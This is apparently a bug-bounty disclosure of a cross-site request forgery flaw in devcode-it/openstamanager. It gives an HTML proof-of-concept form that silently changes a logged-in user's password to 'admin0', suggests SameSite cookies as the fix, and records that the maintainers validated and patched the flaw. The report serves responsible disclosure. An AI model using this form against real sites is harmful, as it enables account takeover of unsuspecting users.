Cross-Site Request Forgery (CSRF) in devcode-it/openstamanager


Reported on

Jul 31st 2021

✍️ Description

Attacker able to change users password if users visit attacker site.

🕵️‍♂️ Proof of Concept

1.Open the PoC.html In Firefox or safari. you can check that password changed to admin0

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8000/openstamanager/modules/utenti/info.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="op" value="self&#95;update" />
      <input type="hidden" name="password" value="admin0" />
      <input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of change password of any user.


Set SameSite attribute of cookies to Lax or Strict.


We have contacted a member of the devcode-it/openstamanager team and are waiting to hear back a year ago
a year ago


hey man, I just want to sure you see this report too.

devcode-it/openstamanager maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
devcode-it/openstamanager maintainer confirmed that a fix has been merged on 402dca a year ago
The fix bounty has been dropped
to join this conversation